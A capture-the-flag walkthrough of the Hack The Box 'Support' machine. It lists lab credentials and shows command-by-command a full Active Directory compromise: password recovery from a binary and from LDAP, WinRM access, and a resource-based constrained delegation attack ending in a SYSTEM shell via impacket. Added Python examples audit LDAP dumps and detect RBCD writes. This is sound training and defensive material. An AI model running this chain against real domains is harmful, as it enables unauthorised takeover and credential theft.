HTB Support done
Support
OS:
Windows
Technology:
LDAP
AD
IP Address:
10.10.11.174
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 09:29:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49755/tcp open msrpc Microsoft Windows RPC
53813/tcp open msrpc Microsoft Windows RPC
Users and pass:
After debugging app UserInfo.exe
L: support
P: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E (encoded)
P: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (decrypted)
---
After dumping all LDAP records, we see a password:
L: support
P: Ironside47pleasure40Watchful
---
After the LDAP dump I found new usernames:
anderson.damian
bardot.mary
cromwell.gerard
daughtler.mabel
ford.victoria
hernandez.stanley
langley.lucy
levine.leopoldo
monroe.david
raven.clifton
smith.rosario
stoll.rachelle
thomas.raphael
west.laura
wilson.shelby
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.174_nmap 10.10.11.174 ; cat 10.10.11.174_nmap.nmap | grep "tcp.*open"
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 11:25 CEST
Nmap scan report for 10.10.11.174
Host is up (0.038s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 09:29:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49755/tcp open msrpc Microsoft Windows RPC
53813/tcp open msrpc Microsoft Windows RPC
SMB - download files
List all shares
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ smbclient -U anonymous -N -L //10.10.11.174
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
└─$ smbclient -U anonymous -N '//10.10.11.174/support-tools'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 19:01:06 2022
.. D 0 Sat May 28 13:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 13:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 13:19:55 2022
putty.exe A 1273576 Sat May 28 13:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 13:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 19:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 13:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 13:19:43 2022
4026367 blocks of size 4096. 970943 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \7-ZipPortable_21.07.paf.exe of size 2880728 as 7-ZipPortable_21.07.paf.exe (879.4 KiloBytes/sec) (average 879.4 KiloBytes/sec)
getting file \npp.8.4.1.portable.x64.zip of size 5439245 as npp.8.4.1.portable.x64.zip (1891.0 KiloBytes/sec) (average 1352.4 KiloBytes/sec)
getting file \putty.exe of size 1273576 as putty.exe (1732.2 KiloBytes/sec) (average 1392.9 KiloBytes/sec)
getting file \SysinternalsSuite.zip of size 48102161 as SysinternalsSuite.zip (1659.6 KiloBytes/sec) (average 1608.4 KiloBytes/sec)
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (599.5 KiloBytes/sec) (average 1595.5 KiloBytes/sec)
getting file \windirstat1_1_2_setup.exe of size 79171 as windirstat1_1_2_setup.exe (351.4 KiloBytes/sec) (average 1587.9 KiloBytes/sec)
getting file \WiresharkPortable64_3.6.5.paf.exe of size 44398000 as WiresharkPortable64_3.6.5.paf.exe (1227.4 KiloBytes/sec) (average 1408.6 KiloBytes/sec)
smb: \> exit
Unpack file: UserInfo.exe
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/smb]
└─$ dir
7-ZipPortable_21.07.paf.exe npp.8.4.1.portable.x64.zip putty.exe SysinternalsSuite.zip UserInfo.exe.zip windirstat1_1_2_setup.exe WiresharkPortable64_3.6.5.paf.exe
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/smb]
└─$ unzip UserInfo.exe.zip -d UserInfo
Archive: UserInfo.exe.zip
inflating: UserInfo/UserInfo.exe
inflating: UserInfo/CommandLineParser.dll
inflating: UserInfo/Microsoft.Bcl.AsyncInterfaces.dll
inflating: UserInfo/Microsoft.Extensions.DependencyInjection.Abstractions.dll
inflating: UserInfo/Microsoft.Extensions.DependencyInjection.dll
inflating: UserInfo/Microsoft.Extensions.Logging.Abstractions.dll
inflating: UserInfo/System.Buffers.dll
inflating: UserInfo/System.Memory.dll
inflating: UserInfo/System.Numerics.Vectors.dll
inflating: UserInfo/System.Runtime.CompilerServices.Unsafe.dll
inflating: UserInfo/System.Threading.Tasks.Extensions.dll
inflating: UserInfo/UserInfo.exe.config
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/smb]
└─$ cd UserInfo
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Support/smb/UserInfo]
└─$ ls
CommandLineParser.dll Microsoft.Extensions.DependencyInjection.Abstractions.dll Microsoft.Extensions.Logging.Abstractions.dll System.Memory.dll System.Runtime.CompilerServices.Unsafe.dll UserInfo.exe
Microsoft.Bcl.AsyncInterfaces.dll Microsoft.Extensions.DependencyInjection.dll System.Buffers.dll System.Numerics.Vectors.dll System.Threading.Tasks.Extensions.dll UserInfo.exe.config
Debug file UserInfo.exe
We found that the username support is used for LDAP, together with this password:
L: support
P: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E (encoded)
We have to decrypt the password using the function getPassword
P: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (decrypted)
Dump all info via LDAP
[389, 636, 3268, 3269 - Pentesting LDAP - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)
---
We found a password (it looks like a password)
___
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/dnSpy]
└─$ ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | tee 10.10.11.174_ldapsearch
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# Users, support.htb
dn: CN=Users,DC=support,DC=htb
objectClass: top
objectClass: container
cn: Users
description: Default container for upgraded user accounts
distinguishedName: CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528110155.0Z
whenChanged: 20220528110155.0Z
uSNCreated: 5660
uSNChanged: 5660
showInAdvancedViewOnly: FALSE
name: Users
objectGUID:: fvT3rPs5nUaComz/MQQwrw==
systemFlags: -1946157056
objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=support,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20220528110344.0Z
dSCorePropagationData: 16010101000001.0Z
...
...
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
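The password above sat in the free-text `info` attribute of a user object. The following added example (not part of the original writeup) audits an `ldapsearch` LDIF dump for password-like values in such attributes; the attribute list and the character-class heuristic are assumptions, and the third sample entry is constructed.

```python
import base64
import re

FREE_TEXT_ATTRS = {"info", "description", "comment"}  # free-text, widely readable

def parse_ldif(text):
    """Parse ldapsearch LDIF output into a list of {attribute: [values]} dicts."""
    text = re.sub(r"\r?\n ", "", text)  # unfold wrapped lines (continuations start with a space)
    entries, current = [], None
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][\w;-]*)(::?)\s*(.*)$", line)
        if not m:  # blank lines and "# ..." comments never match
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":  # "attr:: value" means the value is base64-encoded
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        if attr == "dn":
            current = {"dn": [value]}
            entries.append(current)
        elif current is not None:
            current.setdefault(attr, []).append(value)
    return entries

def looks_like_secret(value, min_len=8):
    """Heuristic: one unbroken token mixing at least three character classes."""
    if len(value) < min_len or re.search(r"\s", value):
        return False
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")
    return sum(bool(re.search(c, value)) for c in classes) >= 3

def audit(ldif_text):
    """Return (dn, attribute, value length) for suspicious values on user objects."""
    findings = []
    for entry in parse_ldif(ldif_text):
        if "user" not in (c.lower() for c in entry.get("objectclass", [])):
            continue
        for attr in sorted(FREE_TEXT_ATTRS.intersection(entry)):
            for value in entry[attr]:
                if looks_like_secret(value):
                    # Report the length only, so the audit output does not leak the secret again.
                    findings.append((entry["dn"][0], attr, len(value)))
    return findings

# Sample input: first two entries trimmed from the dump above, third entry constructed.
SAMPLE_LDIF = "\n".join([
    "dn: CN=Users,DC=support,DC=htb",
    "objectClass: container",
    "description: Default container for upgraded user accounts",
    "dn: CN=support,CN=Users,DC=support,DC=htb",
    "objectClass: user",
    "info: Ironside47pleasure40Watchful",
    "dn: CN=example.user,CN=Users,DC=support,DC=htb",
    "objectClass: user",
    "description:: " + base64.b64encode(b"Temp2024!Welcome").decode(),
])

if __name__ == "__main__":
    for dn, attr, length in audit(SAMPLE_LDIF):
        print(f"[!] {dn}: '{attr}' holds a {length}-character password-like value")
```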
Find new usernames from LDAP
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ cat 10.10.11.174_ldapsearch| grep -oE "CN.*Users" | awk -F'=' '{print $2}' | grep "\." | awk -F "," '{print $1}' | sort | uniq
anderson.damian
bardot.mary
cromwell.gerard
daughtler.mabel
ford.victoria
hernandez.stanley
langley.lucy
levine.leopoldo
monroe.david
raven.clifton
smith.rosario
stoll.rachelle
thomas.raphael
west.laura
wilson.shelby
Login to remote host as user support
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=============== =============================================
support\support S-1-5-21-1677581083-3380853377-188903654-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts Group S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read flag: user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> dir
Directory: C:\Users\support\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/3/2024 2:15 AM 34 user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
2fbbc52f17ae6138da4a05d4cb5390e3
*Evil-WinRM* PS C:\Users\support\Desktop>
Download BloodHound
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ git clone https://github.com/dirkjanm/BloodHound.py.git
Cloning into 'BloodHound.py'...
remote: Enumerating objects: 1518, done.
remote: Counting objects: 100% (613/613), done.
remote: Compressing objects: 100% (101/101), done.
remote: Total 1518 (delta 545), reused 554 (delta 512), pack-reused 905
Receiving objects: 100% (1518/1518), 538.52 KiB | 799.00 KiB/s, done.
Resolving deltas: 100% (1045/1045), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ cd BloodHound.py
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ ls
bloodhound bloodhound.py createforestcache.py Dockerfile LICENSE README.md setup.py
Run BloodHound (remote)
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ python3 bloodhound.py -d support.htb -dc support.htb -c All -ns 10.10.11.174 --zip -u support -p Ironside47pleasure40Watchful
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: support.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: support.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 09S
INFO: Compressing output into 20240403125732_bloodhound.zip
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ ls
20240403125732_bloodhound.zip bloodhound.py Dockerfile README.md
bloodhound createforestcache.py LICENSE setup.py
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ mv 20240403125732_bloodhound.zip ../
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ cd ../
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ unzip 20240403125732_bloodhound.zip -d 10.10.11.174_bloodhound
Archive: 20240403125732_bloodhound.zip
extracting: 10.10.11.174_bloodhound/20240403125732_users.json
extracting: 10.10.11.174_bloodhound/20240403125732_groups.json
extracting: 10.10.11.174_bloodhound/20240403125732_gpos.json
extracting: 10.10.11.174_bloodhound/20240403125732_ous.json
extracting: 10.10.11.174_bloodhound/20240403125732_containers.json
extracting: 10.10.11.174_bloodhound/20240403125732_domains.json
extracting: 10.10.11.174_bloodhound/20240403125732_computers.json
Analysis of the results from Bloodhound
We see that we have the "GenericAll" privilege, which means that we have full rights to all objects in AD.
Privilege Escalation
Add a new computer to AD
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ impacket-addcomputer -computer-name 'hackcomp$' -computer-pass qwerty123 -dc-ip 10.10.11.174 support/support:Ironside47pleasure40Watchful
Impacket v0.11.0 - Copyright 2023 Fortra
[!] No DC host set and 'support' doesn't look like a FQDN. DNS resolution of short names will probably fail.
[*] Successfully added machine account hackcomp$ with password qwerty123.
Add the related security descriptor to the computer (msDS-AllowedToActOnBehalfOfOtherIdentity)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ wget https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py ; file rbcd.py
--2024-04-03 14:15:20-- https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3470 (3.4K) [text/plain]
Saving to: ‘rbcd.py’
rbcd.py 100%[==============================================>] 3.39K --.-KB/s in 0.002s
2024-04-03 14:15:20 (1.61 MB/s) - ‘rbcd.py’ saved [3470/3470]
rbcd.py: Python script, ASCII text executable
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ python3 rbcd.py -f hackcomp -t DC -dc-ip 10.10.11.174 support\\support:Ironside47pleasure40Watchful
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Starting Resource Based Constrained Delegation Attack against DC$
[*] Initializing LDAP connection to 10.10.11.174
[*] Using support\support account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Writing SECURITY_DESCRIPTOR related to (fake) computer `hackcomp` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `DC`
[*] Delegation rights modified succesfully!
[*] hackcomp$ can now impersonate users on DC$ via S4U2Proxy
Get an impersonated service ticket for the target
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ impacket-getST -spn cifs/DC.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support/hackcomp$:qwerty123
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Set the KRB5CCNAME environment variable and add the DC's FQDN to the hosts file
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ export KRB5CCNAME=`pwd`/Administrator.ccache
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ klist
Ticket cache: FILE:/mnt/oscp/writeups/HTB/HTB_Support/Administrator.ccache
Default principal: Administrator@support
Valid starting Expires Service principal
04/03/2024 14:21:44 04/04/2024 00:21:43 cifs/[email protected]
renew until 04/04/2024 14:21:42
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ cat /etc/hosts | grep support
10.10.11.174 support.htb DC.support.htb
Run impacket-psexec to gain a SYSTEM shell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ impacket-psexec -k DC.support.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on DC.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WJsmliRU.exe
[*] Opening SVCManager on DC.support.htb.....
[*] Creating service ifus on DC.support.htb.....
[*] Starting service ifus.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Read flag: root.txt
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of C:\Users\Administrator\Desktop
05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
04/03/2024 02:15 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,969,761,280 bytes free
C:\Users\Administrator\Desktop> type root.txt
01c236f2cbb94dd47d6d8a743d068d5c
C:\Users\Administrator\Desktop>
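The escalation chain above (new machine account, then a write to msDS-AllowedToActOnBehalfOfOtherIdentity) leaves two Windows Security events that can be correlated: 4741 (computer account created) and 5136 (directory object modified). The following detection sketch is an added example, not part of the original writeup; the flat dict event shape, the `svc-join` allowlist entry, the one-hour window and all sample events are constructed assumptions.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
PROVISIONING_ACCOUNTS = {"svc-join"}  # hypothetical accounts expected to join machines
WINDOW = timedelta(hours=1)           # assumed correlation window

# Constructed sample events, reduced to the fields the correlation needs.
EVENTS = [
    {"time": "2024-04-03T12:10:02", "id": 4741, "SubjectUserName": "support",
     "TargetUserName": "hackcomp$"},
    {"time": "2024-04-03T12:15:40", "id": 5136, "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"time": "2024-04-03T12:20:11", "id": 5136, "SubjectUserName": "support",
     "ObjectDN": "CN=support,CN=Users,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description"},
    {"time": "2024-04-03T13:01:00", "id": 4741, "SubjectUserName": "svc-join",
     "TargetUserName": "WS042$"},
    {"time": "2024-04-03T13:30:00", "id": 5136, "SubjectUserName": "admin.ops",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
]

def detect_rbcd_writes(events):
    """Alert on every write to the RBCD attribute; escalate to 'high' when the
    writer also created a machine account shortly before."""
    created = {}  # subject -> [(timestamp, machine account name)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        who = ev["SubjectUserName"].lower()
        if ev["id"] == 4741 and who not in PROVISIONING_ACCOUNTS:
            created.setdefault(who, []).append((ts, ev["TargetUserName"]))
        elif ev["id"] == 5136 and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR:
            recent = [name for t, name in created.get(who, []) if ts - t <= WINDOW]
            alerts.append({
                "severity": "high" if recent else "medium",
                "subject": who,
                "target": ev["ObjectDN"],
                "new_machine_accounts": recent,
            })
    return alerts

if __name__ == "__main__":
    for alert in detect_rbcd_writes(EVENTS):
        print(alert)
```

Event 5136 is only logged when directory service change auditing is enabled and the object carries a matching SACL. Setting ms-DS-MachineAccountQuota to 0 removes the ability of ordinary users to create the machine account in the first place.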
References
[389, 636, 3268, 3269 - Pentesting LDAP - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)
[Kerberos Resource-based Constrained Delegation: Computer Object Takeover](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution)
[Rbcd-Attack - Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket](https://hakin9.org/rbcd-attack-kerberos-resource-based-constrained-delegation-attack-from-outside-using-impacket/)
[Abusing Kerberos Resource-Based Constrained Delegation](https://github.com/tothi/rbcd-attack/blob/master/rbcd.py)
Lessons Learned